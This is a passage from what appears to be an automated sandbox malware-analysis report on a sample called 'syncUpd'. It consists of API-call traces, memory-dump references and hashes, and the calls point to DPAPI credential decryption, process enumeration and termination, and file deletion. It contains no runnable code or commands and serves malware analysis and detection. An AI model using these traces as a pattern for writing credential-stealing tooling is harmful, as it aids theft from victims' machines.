                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FD346
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FD35A
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FD3D3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                                              • Opcode ID: c558b7e00d0d76aa72a1bcc311bbf49d9e1781368b121fae5ccf1dcd978b6673
                                                                                                                                                                                                                                                              • Instruction ID: 76f7b27f66bce32d578d7153facc8435d51abb97ec388efd81cbecfb27b1ce08
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c558b7e00d0d76aa72a1bcc311bbf49d9e1781368b121fae5ccf1dcd978b6673
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A81D872D042089ECB14FBE4DCA2EEEB339AF94714F504529F516A61D1EE747A08CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrlen.KERNEL32(008F4E2C,?,?,008F4E2C,0041D79A), ref: 00907092
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrcpy.KERNEL32(0041D79A,00000000), ref: 009070EC
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 1400469952-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: cf0923edcf58d9fd68d49d25af9debf8b9c2c01576fe0c70bfcba815ecf84208
                                                                                                                                                                                                                                                              • Instruction ID: b84aa922060131e3fe13fe1bd4b89ae76e89a6898b35400ca1134efdcdde526e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf0923edcf58d9fd68d49d25af9debf8b9c2c01576fe0c70bfcba815ecf84208
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4541E6B1A0021CAFDB04DFA8D895FEDB7B5FF84304F108118F609AB294DB74AA55CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00411378
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0041146F
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3184129880-0
                                                                                                                                                                                                                                                              • Opcode ID: 2e419d620f0a5b825e319d5da671caaf45571abc24dc68d77d646ed724d5e6f1
                                                                                                                                                                                                                                                              • Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e419d620f0a5b825e319d5da671caaf45571abc24dc68d77d646ed724d5e6f1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00964490), ref: 0040971B
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                                                • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                              • String ID: $DPAPI
                                                                                                                                                                                                                                                              • API String ID: 1204593910-1819349886
                                                                                                                                                                                                                                                              • Opcode ID: f1c1b07571841af84a2b01cf28d74e2b7f9a03ce27126835c702bcf18e36c141
                                                                                                                                                                                                                                                              • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1c1b07571841af84a2b01cf28d74e2b7f9a03ce27126835c702bcf18e36c141
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00415BEB
                                                                                                                                                                                                                                                                • Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                                                                • Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                                                                • Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415CD6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 396451647-0
                                                                                                                                                                                                                                                              • Opcode ID: 0e7f8b516c05cadfa921e6f98f8774a216040b61a2b6ffbcf4ce966bdf0338b7
                                                                                                                                                                                                                                                              • Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e7f8b516c05cadfa921e6f98f8774a216040b61a2b6ffbcf4ce966bdf0338b7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00905E52
                                                                                                                                                                                                                                                                • Part of subcall function 009056B7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00905E85,00000000), ref: 009056C2
                                                                                                                                                                                                                                                                • Part of subcall function 009056B7: RtlAllocateHeap.NTDLL(00000000), ref: 009056C9
                                                                                                                                                                                                                                                                • Part of subcall function 009056B7: wsprintfW.USER32 ref: 009056DF
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00905F12
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00905F30
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00905F3D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3729781310-0
                                                                                                                                                                                                                                                              • Opcode ID: 6407d1539de54230c31308d720df9c4720da3bccaf40962f38996e6942d990c9
                                                                                                                                                                                                                                                              • Instruction ID: 3526a112bff002b3e87506a21a3b6144f951d810e998d981e3ea494bd0c11945
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6407d1539de54230c31308d720df9c4720da3bccaf40962f38996e6942d990c9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1312AB1E00248AFDB14DFE0CD49BEEB779BF84700F104458E606AA1C4DB79AA45CF51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0090506E
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 00905082
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00905097
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00905105
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1066202413-0
                                                                                                                                                                                                                                                              • Opcode ID: b52d0566d22262ac0ca84fccd2a79ab41aaba5a1cfdbd13057ab198f5e8d9997
                                                                                                                                                                                                                                                              • Instruction ID: 6dff117a604c327722363333f012f07a5a8137ac49dfe84c2a1c53866fdef325
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52d0566d22262ac0ca84fccd2a79ab41aaba5a1cfdbd13057ab198f5e8d9997
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F210871904618AFCB25EBA0DC95FEEB378AF94704F1041D9A50AA61D1EF746F84CF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3407564107-0
                                                                                                                                                                                                                                                              • Opcode ID: 38c53f5a606269b64edeae665f1f90b57f3911939e66431622d8e48dd442a9d3
                                                                                                                                                                                                                                                              • Instruction ID: 4291e5f43860a2eebb0eb132f307bd413cf0df7a341500e2fd877f898b946bdd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38c53f5a606269b64edeae665f1f90b57f3911939e66431622d8e48dd442a9d3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F114670C0420DEFCB14EFE4D944AEEBB75FF44304F108068EA06A6291EB306B44CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID: %dx%d
                                                                                                                                                                                                                                                              • API String ID: 2716131235-2206825331
                                                                                                                                                                                                                                                              • Opcode ID: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
                                                                                                                                                                                                                                                              • Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcatlstrcpy
                                                                                                                                                                                                                                                              • String ID: 6F@$6F@
                                                                                                                                                                                                                                                              • API String ID: 3905823039-140834422
                                                                                                                                                                                                                                                              • Opcode ID: 8506d317a09af5bd4aa6fc40b9ad0c04fc27a29f8cf437679aaa0c638765c5d5
                                                                                                                                                                                                                                                              • Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8506d317a09af5bd4aa6fc40b9ad0c04fc27a29f8cf437679aaa0c638765c5d5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1378416451-0
                                                                                                                                                                                                                                                              • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                              • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00901AE0,80000000,00000003,00000000,00000003,00000080,00000000,?,00901AE0,?), ref: 00905C63
                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,00901AE0), ref: 00905C80
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00905C8E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1378416451-0
                                                                                                                                                                                                                                                              • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                              • Instruction ID: 56303955406230bec71275922f68589d26b07886e6f279d1c029fa3c3657ee7f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F01D79B00618ABEB20DBB0DC49B5A7779AB44714F11C554AA51A71C4DA7496018B40
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1243822799-0
                                                                                                                                                                                                                                                              • Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                                                              • Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
